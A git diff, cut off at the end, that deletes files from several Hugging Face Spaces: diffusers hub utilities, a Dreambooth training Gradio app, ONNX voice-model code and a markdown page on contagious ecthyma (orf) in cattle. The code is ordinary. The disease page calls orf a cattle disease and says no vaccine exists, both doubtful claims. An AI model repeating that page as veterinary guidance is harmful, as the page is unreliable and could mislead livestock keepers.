    " - -examples = [ - ["turtle.jpg"], - ["lions.jpg"] -] - -gr.Interface(depth, inputs, outputs, title=title, description=description, article=article, examples=examples, analytics_enabled=False).launch(enable_queue=True,cache_examples=True) \ No newline at end of file diff --git a/spaces/Salesforce/EDICT/my_diffusers/hub_utils.py b/spaces/Salesforce/EDICT/my_diffusers/hub_utils.py deleted file mode 100644 index c07329e36fe7a8826b0f1fb22396819b220e1b58..0000000000000000000000000000000000000000 --- a/spaces/Salesforce/EDICT/my_diffusers/hub_utils.py +++ /dev/null @@ -1,197 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - - -import os -import shutil -from pathlib import Path -from typing import Optional - -from huggingface_hub import HfFolder, Repository, whoami - -from .pipeline_utils import DiffusionPipeline -from .utils import is_modelcards_available, logging - - -if is_modelcards_available(): - from modelcards import CardData, ModelCard - - -logger = logging.get_logger(__name__) - - -MODEL_CARD_TEMPLATE_PATH = Path(__file__).parent / "utils" / "model_card_template.md" - - -def get_full_repo_name(model_id: str, organization: Optional[str] = None, token: Optional[str] = None): - if token is None: - token = HfFolder.get_token() - if organization is None: - username = whoami(token)["name"] - return f"{username}/{model_id}" - else: - return f"{organization}/{model_id}" - - -def init_git_repo(args, at_init: bool = False): - """ - Args: - Initializes a git repo in `args.hub_model_id`. - at_init (`bool`, *optional*, defaults to `False`): - Whether this function is called before any training or not. If `self.args.overwrite_output_dir` is `True` - and `at_init` is `True`, the path to the repo (which is `self.args.output_dir`) might be wiped out. - """ - if hasattr(args, "local_rank") and args.local_rank not in [-1, 0]: - return - hub_token = args.hub_token if hasattr(args, "hub_token") else None - use_auth_token = True if hub_token is None else hub_token - if not hasattr(args, "hub_model_id") or args.hub_model_id is None: - repo_name = Path(args.output_dir).absolute().name - else: - repo_name = args.hub_model_id - if "/" not in repo_name: - repo_name = get_full_repo_name(repo_name, token=hub_token) - - try: - repo = Repository( - args.output_dir, - clone_from=repo_name, - use_auth_token=use_auth_token, - private=args.hub_private_repo, - ) - except EnvironmentError: - if args.overwrite_output_dir and at_init: - # Try again after wiping output_dir - shutil.rmtree(args.output_dir) - repo = Repository( - args.output_dir, - clone_from=repo_name, - use_auth_token=use_auth_token, - ) - else: - raise - - repo.git_pull() - - # By default, ignore the checkpoint folders - if not os.path.exists(os.path.join(args.output_dir, ".gitignore")): - with open(os.path.join(args.output_dir, ".gitignore"), "w", encoding="utf-8") as writer: - writer.writelines(["checkpoint-*/"]) - - return repo - - -def push_to_hub( - args, - pipeline: DiffusionPipeline, - repo: Repository, - commit_message: Optional[str] = "End of training", - blocking: bool = True, - **kwargs, -) -> str: - """ - Parameters: - Upload *self.model* and *self.tokenizer* to the 🤗 model hub on the repo *self.args.hub_model_id*. - commit_message (`str`, *optional*, defaults to `"End of training"`): - Message to commit while pushing. - blocking (`bool`, *optional*, defaults to `True`): - Whether the function should return only when the `git push` has finished. - kwargs: - Additional keyword arguments passed along to [`create_model_card`]. - Returns: - The url of the commit of your model in the given repository if `blocking=False`, a tuple with the url of the - commit and an object to track the progress of the commit if `blocking=True` - """ - - if not hasattr(args, "hub_model_id") or args.hub_model_id is None: - model_name = Path(args.output_dir).name - else: - model_name = args.hub_model_id.split("/")[-1] - - output_dir = args.output_dir - os.makedirs(output_dir, exist_ok=True) - logger.info(f"Saving pipeline checkpoint to {output_dir}") - pipeline.save_pretrained(output_dir) - - # Only push from one node. - if hasattr(args, "local_rank") and args.local_rank not in [-1, 0]: - return - - # Cancel any async push in progress if blocking=True. The commits will all be pushed together. - if ( - blocking - and len(repo.command_queue) > 0 - and repo.command_queue[-1] is not None - and not repo.command_queue[-1].is_done - ): - repo.command_queue[-1]._process.kill() - - git_head_commit_url = repo.push_to_hub(commit_message=commit_message, blocking=blocking, auto_lfs_prune=True) - # push separately the model card to be independent from the rest of the model - create_model_card(args, model_name=model_name) - try: - repo.push_to_hub(commit_message="update model card README.md", blocking=blocking, auto_lfs_prune=True) - except EnvironmentError as exc: - logger.error(f"Error pushing update to the model card. Please read logs and retry.\n${exc}") - - return git_head_commit_url - - -def create_model_card(args, model_name): - if not is_modelcards_available: - raise ValueError( - "Please make sure to have `modelcards` installed when using the `create_model_card` function. You can" - " install the package with `pip install modelcards`." - ) - - if hasattr(args, "local_rank") and args.local_rank not in [-1, 0]: - return - - hub_token = args.hub_token if hasattr(args, "hub_token") else None - repo_name = get_full_repo_name(model_name, token=hub_token) - - model_card = ModelCard.from_template( - card_data=CardData( # Card metadata object that will be converted to YAML block - language="en", - license="apache-2.0", - library_name="diffusers", - tags=[], - datasets=args.dataset_name, - metrics=[], - ), - template_path=MODEL_CARD_TEMPLATE_PATH, - model_name=model_name, - repo_name=repo_name, - dataset_name=args.dataset_name if hasattr(args, "dataset_name") else None, - learning_rate=args.learning_rate, - train_batch_size=args.train_batch_size, - eval_batch_size=args.eval_batch_size, - gradient_accumulation_steps=args.gradient_accumulation_steps - if hasattr(args, "gradient_accumulation_steps") - else None, - adam_beta1=args.adam_beta1 if hasattr(args, "adam_beta1") else None, - adam_beta2=args.adam_beta2 if hasattr(args, "adam_beta2") else None, - adam_weight_decay=args.adam_weight_decay if hasattr(args, "adam_weight_decay") else None, - adam_epsilon=args.adam_epsilon if hasattr(args, "adam_epsilon") else None, - lr_scheduler=args.lr_scheduler if hasattr(args, "lr_scheduler") else None, - lr_warmup_steps=args.lr_warmup_steps if hasattr(args, "lr_warmup_steps") else None, - ema_inv_gamma=args.ema_inv_gamma if hasattr(args, "ema_inv_gamma") else None, - ema_power=args.ema_power if hasattr(args, "ema_power") else None, - ema_max_decay=args.ema_max_decay if hasattr(args, "ema_max_decay") else None, - mixed_precision=args.mixed_precision, - ) - - card_path = os.path.join(args.output_dir, "README.md") - model_card.save(card_path) diff --git a/spaces/SarthakSidhant/Go-Cattle/diseases/contagious ecthyma (orf).md b/spaces/SarthakSidhant/Go-Cattle/diseases/contagious ecthyma (orf).md deleted file mode 100644 index 13d67dbcc79c9908c63c8103443b48f6852a4c9d..0000000000000000000000000000000000000000 --- a/spaces/SarthakSidhant/Go-Cattle/diseases/contagious ecthyma (orf).md +++ /dev/null @@ -1,39 +0,0 @@ -## Contagious ecthyma (orf) - -**Information** : Contagious ecthyma (orf) is a highly contagious viral disease of cattle that causes raised, crusty lesions on the skin. The virus is spread through direct contact with infected animals or their secretions. -[Image of Contagious ecthyma (orf) in cattle] - -**Symptoms** - -The symptoms of contagious ecthyma typically appear within 2-5 days of infection and include: - -* Raised, crusty lesions on the lips, tongue, muzzle, teats, and coronary bands of the hooves -* Painful eating and drinking -* Drooling -* Fever -* Swelling of the lymph nodes in the head and neck - -**Remedies** - -There is no specific treatment for contagious ecthyma. Treatment is usually supportive and may include: - -* Providing pain relief -* Administering fluids and electrolytes -* Treating secondary bacterial infections - -**Causes** - -Contagious ecthyma (orf) is caused by the orf virus, which is a member of the poxvirus family. The virus is spread through direct contact with infected animals or their secretions. The virus can also be spread through contact with contaminated objects, such as feed, water, or equipment. - -**Prevention** - -There is no vaccine available for contagious ecthyma. However, there are a number of preventive measures that can be taken to reduce the risk of infection, such as: - -* Practicing good biosecurity measures -* Isolating infected animals from healthy animals -* Cleaning and disinfecting contaminated areas -* Vaccinating cattle against other diseases that can weaken the immune system, such as bovine viral diarrhea virus (BVDV) and rotavirus - -**Differential diagnosis** - -Contagious ecthyma can be difficult to distinguish from other diseases that cause mouth lesions, such as foot-and-mouth disease, bovine papular stomatitis, and vesicular stomatitis. A veterinarian can diagnose contagious ecthyma by testing a sample of the lesions for the presence of the orf virus. diff --git a/spaces/Senpaisora6/dreambooth-training/app.py b/spaces/Senpaisora6/dreambooth-training/app.py deleted file mode 100644 index 25728e55803278642ca68a4f8da27d72745667aa..0000000000000000000000000000000000000000 --- a/spaces/Senpaisora6/dreambooth-training/app.py +++ /dev/null @@ -1,340 +0,0 @@ -import gradio as gr -import os -from pathlib import Path -import argparse -import shutil -from train_dreambooth import run_training -from convertosd import convert -from PIL import Image -from slugify import slugify -import requests -import torch -import zipfile -from diffusers import StableDiffusionPipeline - -css = ''' - .instruction{position: absolute; top: 0;right: 0;margin-top: 0px !important} - .arrow{position: absolute;top: 0;right: -110px;margin-top: -8px !important} - #component-4, #component-3, #component-10{min-height: 0} -''' -model_to_load = "multimodalart/sd-fine-tunable" -maximum_concepts = 3 -#Pre download the files even if we don't use it here -StableDiffusionPipeline.from_pretrained(model_to_load) - -def zipdir(path, ziph): - # ziph is zipfile handle - for root, dirs, files in os.walk(path): - for file in files: - ziph.write(os.path.join(root, file), - os.path.relpath(os.path.join(root, file), - os.path.join(path, '..'))) - -def swap_text(option): - mandatory_liability = "You must have the right to do so and you are liable for the images you use, example:" - if(option == "object"): - instance_prompt_example = "cttoy" - freeze_for = 50 - return [f"You are going to train `object`(s), upload 5-10 images of each object you are planning on training on from different angles/perspectives. {mandatory_liability}:", '''''', f"You should name your concept with a unique made up word that has low chance of the model already knowing it (e.g.: `{instance_prompt_example}` here). Images will be automatically cropped to 512x512.", freeze_for] - elif(option == "person"): - instance_prompt_example = "julcto" - freeze_for = 100 - return [f"You are going to train a `person`(s), upload 10-20 images of each person you are planning on training on from different angles/perspectives. {mandatory_liability}:", '''''', f"You should name the files with a unique word that represent your concept (e.g.: `{instance_prompt_example}` here). Images will be automatically cropped to 512x512.", freeze_for] - elif(option == "style"): - instance_prompt_example = "trsldamrl" - freeze_for = 10 - return [f"You are going to train a `style`, upload 10-20 images of the style you are planning on training on. Name the files with the words you would like {mandatory_liability}:", '''''', f"You should name your files with a unique word that represent your concept (e.g.: `{instance_prompt_example}` here). Images will be automatically cropped to 512x512.", freeze_for] - -def count_files(*inputs): - file_counter = 0 - concept_counter = 0 - for i, input in enumerate(inputs): - if(i < maximum_concepts-1): - files = inputs[i] - if(files): - concept_counter+=1 - file_counter+=len(files) - uses_custom = inputs[-1] - type_of_thing = inputs[-4] - if(uses_custom): - Training_Steps = int(inputs[-3]) - else: - if(type_of_thing == "person"): - Training_Steps = file_counter*200*2 - else: - Training_Steps = file_counter*200 - return(gr.update(visible=True, value=f"You are going to train {concept_counter} {type_of_thing}(s), with {file_counter} images for {Training_Steps} steps. This should take around {round(Training_Steps/1.5, 2)} seconds, or {round((Training_Steps/1.5)/3600, 2)} hours. As a reminder, the T4 GPU costs US$0.60 for 1h. Once training is over, don't forget to swap the hardware back to CPU.")) - -def train(*inputs): - if "IS_SHARED_UI" in os.environ: - raise gr.Error("This Space only works in duplicated instances") - if os.path.exists("output_model"): shutil.rmtree('output_model') - if os.path.exists("instance_images"): shutil.rmtree('instance_images') - if os.path.exists("diffusers_model.zip"): os.remove("diffusers_model.zip") - if os.path.exists("model.ckpt"): os.remove("model.ckpt") - file_counter = 0 - for i, input in enumerate(inputs): - if(i < maximum_concepts-1): - if(input): - os.makedirs('instance_images',exist_ok=True) - files = inputs[i+(maximum_concepts*2)] - prompt = inputs[i+maximum_concepts] - if(prompt == "" or prompt == None): - raise gr.Error("You forgot to define your concept prompt") - for j, file_temp in enumerate(files): - file = Image.open(file_temp.name) - width, height = file.size - side_length = min(width, height) - left = (width - side_length)/2 - top = (height - side_length)/2 - right = (width + side_length)/2 - bottom = (height + side_length)/2 - image = file.crop((left, top, right, bottom)) - image = image.resize((512, 512)) - extension = file_temp.name.split(".")[1] - image = image.convert('RGB') - image.save(f'instance_images/{prompt}_({j+1}).jpg', format="JPEG", quality = 100) - file_counter += 1 - - os.makedirs('output_model',exist_ok=True) - uses_custom = inputs[-1] - type_of_thing = inputs[-4] - if(uses_custom): - Training_Steps = int(inputs[-3]) - Train_text_encoder_for = int(inputs[-2]) - else: - Training_Steps = file_counter*200 - if(type_of_thing == "object"): - Train_text_encoder_for=30 - elif(type_of_thing == "person"): - Train_text_encoder_for=60 - elif(type_of_thing == "style"): - Train_text_encoder_for=15 - - class_data_dir = None - stptxt = int((Training_Steps*Train_text_encoder_for)/100) - args_general = argparse.Namespace( - image_captions_filename = True, - train_text_encoder = True, - stop_text_encoder_training = stptxt, - save_n_steps = 0, - pretrained_model_name_or_path = model_to_load, - instance_data_dir="instance_images", - class_data_dir=class_data_dir, - output_dir="output_model", - instance_prompt="", - seed=42, - resolution=512, - mixed_precision="fp16", - train_batch_size=1, - gradient_accumulation_steps=1, - use_8bit_adam=True, - learning_rate=2e-6, - lr_scheduler="polynomial", - lr_warmup_steps = 0, - max_train_steps=Training_Steps, - ) - run_training(args_general) - torch.cuda.empty_cache() - #convert("output_model", "model.ckpt") - #shutil.rmtree('instance_images') - #shutil.make_archive("diffusers_model", 'zip', "output_model") - with zipfile.ZipFile('diffusers_model.zip', 'w', zipfile.ZIP_DEFLATED) as zipf: - zipdir('output_model/', zipf) - torch.cuda.empty_cache() - return [gr.update(visible=True, value=["diffusers_model.zip"]), gr.update(visible=True), gr.update(visible=True), gr.update(visible=True)] - -def generate(prompt): - from diffusers import StableDiffusionPipeline - - pipe = StableDiffusionPipeline.from_pretrained("./output_model", torch_dtype=torch.float16) - pipe = pipe.to("cuda") - image = pipe(prompt).images[0] - return(image) - -def push(model_name, where_to_upload, hf_token): - if(not os.path.exists("model.ckpt")): - convert("output_model", "model.ckpt") - from huggingface_hub import HfApi, HfFolder, CommitOperationAdd - from huggingface_hub import create_repo - model_name_slug = slugify(model_name) - if(where_to_upload == "My personal profile"): - api = HfApi() - your_username = api.whoami(token=hf_token)["name"] - model_id = f"{your_username}/{model_name_slug}" - else: - model_id = f"sd-dreambooth-library/{model_name_slug}" - headers = {"Authorization" : f"Bearer: {hf_token}", "Content-Type": "application/json"} - response = requests.post("https://huggingface.co/organizations/sd-dreambooth-library/share/SSeOwppVCscfTEzFGQaqpfcjukVeNrKNHX", headers=headers) - - images_upload = os.listdir("instance_images") - image_string = "" - instance_prompt_list = [] - previous_instance_prompt = '' - for i, image in enumerate(images_upload): - instance_prompt = image.split("_")[0] - if(instance_prompt != previous_instance_prompt): - title_instance_prompt_string = instance_prompt - instance_prompt_list.append(instance_prompt) - else: - title_instance_prompt_string = '' - previous_instance_prompt = instance_prompt - image_string = f'''{title_instance_prompt_string} -{image_string}![{instance_prompt} {i}](https://huggingface.co/{model_id}/resolve/main/sample_images/{image})''' - readme_text = f'''--- -license: creativeml-openrail-m -tags: -- text-to-image ---- -### {model_name} Dreambooth model trained by {api.whoami(token=hf_token)["name"]} with [Hugging Face Dreambooth Training Space](https://huggingface.co/spaces/multimodalart/dreambooth-training) - -You run your new concept via `diffusers` [Colab Notebook for Inference](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/sd_dreambooth_inference.ipynb) - -Sample pictures of this concept: -{image_string} -''' - #Save the readme to a file - readme_file = open("README.md", "w") - readme_file.write(readme_text) - readme_file.close() - #Save the token identifier to a file - text_file = open("token_identifier.txt", "w") - text_file.write(', '.join(instance_prompt_list)) - text_file.close() - create_repo(model_id,private=True, token=hf_token) - operations = [ - CommitOperationAdd(path_in_repo="token_identifier.txt", path_or_fileobj="token_identifier.txt"), - CommitOperationAdd(path_in_repo="README.md", path_or_fileobj="README.md"), - CommitOperationAdd(path_in_repo=f"model.ckpt",path_or_fileobj="model.ckpt") - ] - api.create_commit( - repo_id=model_id, - operations=operations, - commit_message=f"Upload the model {model_name}", - token=hf_token - ) - api.upload_folder( - folder_path="output_model", - repo_id=model_id, - token=hf_token - ) - api.upload_folder( - folder_path="instance_images", - path_in_repo="concept_images", - repo_id=model_id, - token=hf_token - ) - return [gr.update(visible=True, value=f"Successfully uploaded your model. Access it [here](https://huggingface.co/{model_id})"), gr.update(visible=True, value=["diffusers_model.zip", "model.ckpt"])] - -def convert_to_ckpt(): - convert("output_model", "model.ckpt") - return gr.update(visible=True, value=["diffusers_model.zip", "model.ckpt"]) - -with gr.Blocks(css=css) as demo: - with gr.Box(): - if "IS_SHARED_UI" in os.environ: - gr.HTML(''' -
    -

    Attention - This Space doesn't work in this shared UI

    -

    For it to work, you have to duplicate the Space and run it on your own profile where a (paid) private GPU will be attributed to it during runtime. As each T4 costs US$0,60/h, it should cost < US$1 to train a model with less than 100 images on default settings!

    - - -
    - ''') - else: - gr.HTML(''' -
    -

    You have successfully cloned the Dreambooth Training Space

    -

    If you haven't already, attribute a T4 GPU to it (via the Settings tab) and run the training below. You will be billed by the minute from when you activate the GPU until when you turn it off.

    -
    - ''') - gr.Markdown("# Dreambooth training") - gr.Markdown("Customize Stable Diffusion by giving it with few-shot examples") - with gr.Row(): - type_of_thing = gr.Dropdown(label="What would you like to train?", choices=["object", "person", "style"], value="object", interactive=True) - - with gr.Row(): - with gr.Column(): - thing_description = gr.Markdown("You are going to train an `object`, upload 5-10 images of the object you are planning on training on from different angles/perspectives. You must have the right to do so and you are liable for the images you use, example:") - thing_image_example = gr.HTML('''''') - things_naming = gr.Markdown("You should name your concept with a unique made up word that has low chance of the model already knowing it (e.g.: `cttoy` here). Images will be automatically cropped to 512x512.") - with gr.Column(): - file_collection = [] - concept_collection = [] - buttons_collection = [] - delete_collection = [] - is_visible = [] - - row = [None] * maximum_concepts - for x in range(maximum_concepts): - ordinal = lambda n: "%d%s" % (n, "tsnrhtdd"[(n // 10 % 10 != 1) * (n % 10 < 4) * n % 10::4]) - if(x == 0): - visible = True - is_visible.append(gr.State(value=True)) - else: - visible = False - is_visible.append(gr.State(value=False)) - - file_collection.append(gr.File(label=f"Upload the images for your {ordinal(x+1)} concept", file_count="multiple", interactive=True, visible=visible)) - with gr.Column(visible=visible) as row[x]: - concept_collection.append(gr.Textbox(label=f"{ordinal(x+1)} concept prompt - use a unique, made up word to avoid collisions")) - with gr.Row(): - if(x < maximum_concepts-1): - buttons_collection.append(gr.Button(value="Add +1 concept", visible=visible)) - if(x > 0): - delete_collection.append(gr.Button(value=f"Delete {ordinal(x+1)} concept")) - - counter_add = 1 - for button in buttons_collection: - if(counter_add < len(buttons_collection)): - button.click(lambda: - [gr.update(visible=True),gr.update(visible=True), gr.update(visible=False), gr.update(visible=True), True, None], - None, - [row[counter_add], file_collection[counter_add], buttons_collection[counter_add-1], buttons_collection[counter_add], is_visible[counter_add], file_collection[counter_add]], queue=False) - else: - button.click(lambda:[gr.update(visible=True),gr.update(visible=True), gr.update(visible=False), True], None, [row[counter_add], file_collection[counter_add], buttons_collection[counter_add-1], is_visible[counter_add]], queue=False) - counter_add += 1 - - counter_delete = 1 - for delete_button in delete_collection: - if(counter_delete < len(delete_collection)+1): - delete_button.click(lambda:[gr.update(visible=False),gr.update(visible=False), gr.update(visible=True), False], None, [file_collection[counter_delete], row[counter_delete], buttons_collection[counter_delete-1], is_visible[counter_delete]], queue=False) - counter_delete += 1 - - - - with gr.Accordion("Custom Settings", open=False): - swap_auto_calculated = gr.Checkbox(label="Use custom settings") - gr.Markdown("If not checked, the number of steps and % of frozen encoder will be tuned automatically according to the amount of images you upload and whether you are training an `object`, `person` or `style` as follows: The number of steps is calculated by number of images uploaded multiplied by 20. The text-encoder is frozen after 10% of the steps for a style, 30% of the steps for an object and is fully trained for persons.") - steps = gr.Number(label="How many steps", value=800) - perc_txt_encoder = gr.Number(label="Percentage of the training steps the text-encoder should be trained as well", value=30) - - type_of_thing.change(fn=swap_text, inputs=[type_of_thing], outputs=[thing_description, thing_image_example, things_naming, perc_txt_encoder], queue=False) - training_summary = gr.Textbox("", visible=False, label="Training Summary") - steps.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - perc_txt_encoder.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - for file in file_collection: - file.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - train_btn = gr.Button("Start Training") - with gr.Box(visible=False) as try_your_model: - gr.Markdown("## Try your model") - with gr.Row(): - prompt = gr.Textbox(label="Type your prompt") - result_image = gr.Image() - generate_button = gr.Button("Generate Image") - with gr.Box(visible=False) as push_to_hub: - gr.Markdown("## Push to Hugging Face Hub") - model_name = gr.Textbox(label="Name of your model", placeholder="Tarsila do Amaral Style") - where_to_upload = gr.Dropdown(["My personal profile", "Public Library"], label="Upload to") - gr.Markdown("[A Hugging Face write access token](https://huggingface.co/settings/tokens), go to \"New token\" -> Role : Write. A regular read token won't work here.") - hf_token = gr.Textbox(label="Hugging Face Write Token") - push_button = gr.Button("Push to the Hub") - result = gr.File(label="Download the uploaded models in the diffusers format", visible=True) - success_message_upload = gr.Markdown(visible=False) - convert_button = gr.Button("Convert to CKPT", visible=False) - - train_btn.click(fn=train, inputs=is_visible+concept_collection+file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[result, try_your_model, push_to_hub, convert_button]) - generate_button.click(fn=generate, inputs=prompt, outputs=result_image) - push_button.click(fn=push, inputs=[model_name, where_to_upload, hf_token], outputs=[success_message_upload, result]) - convert_button.click(fn=convert_to_ckpt, inputs=[], outputs=result) -demo.launch() \ No newline at end of file diff --git a/spaces/ServerX/PorcoDiaz/infer/lib/infer_pack/models_onnx.py b/spaces/ServerX/PorcoDiaz/infer/lib/infer_pack/models_onnx.py deleted file mode 100644 index 3e99763bf3ed7988eb2ae33d9066f85d37adf119..0000000000000000000000000000000000000000 --- a/spaces/ServerX/PorcoDiaz/infer/lib/infer_pack/models_onnx.py +++ /dev/null @@ -1,824 +0,0 @@ -import math -import logging - -logger = logging.getLogger(__name__) - -import numpy as np -import torch -from torch import nn -from torch.nn import AvgPool1d, Conv1d, Conv2d, ConvTranspose1d -from torch.nn import functional as F -from torch.nn.utils import remove_weight_norm, spectral_norm, weight_norm - -from infer.lib.infer_pack import attentions, commons, modules -from infer.lib.infer_pack.commons import get_padding, init_weights - - -class TextEncoder256(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class TextEncoder768(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(768, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0, - ): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - def remove_weight_norm(self): - for i in range(self.n_flows): - self.flows[i * 2].remove_weight_norm() - - -class PosteriorEncoder(nn.Module): - def __init__( - self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - def remove_weight_norm(self): - self.enc.remove_weight_norm() - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def forward(self, f0, upp): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: 